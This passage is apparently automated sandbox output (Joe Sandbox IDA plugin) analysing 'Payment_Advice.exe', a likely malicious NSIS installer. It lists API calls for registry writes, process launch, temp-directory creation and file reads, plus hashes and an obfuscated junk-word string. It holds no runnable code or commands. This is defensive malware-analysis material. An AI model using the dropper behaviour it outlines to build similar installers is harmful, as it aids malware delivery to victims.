                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-44229769
                                                  • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                  • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                  • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                  • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                  • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID:
                                                  • API String ID: 1356686001-0
                                                  • Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                                                  • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                  • Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                                                  • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                                                  APIs
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                    • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                    • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3585118688-0
                                                  • Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                                                  • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                  • Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                                                  • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                  • CloseHandle.KERNEL32(?), ref: 00405695
                                                  Strings
                                                  • Error launching installer, xrefs: 00405676
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                  • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                  • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                  • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                  APIs
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                                    • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00403345
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 4115351271-2030658151
                                                  • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                  • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                                                  • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                  • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                  • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                  • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                  • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                  • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                  • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                  • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                  • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                  • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                  • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                  • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                  • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                  • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                  • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                  • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                  • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                  • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                  • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                  • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                  APIs
                                                  • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                                                  Strings
                                                  • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: FileRead
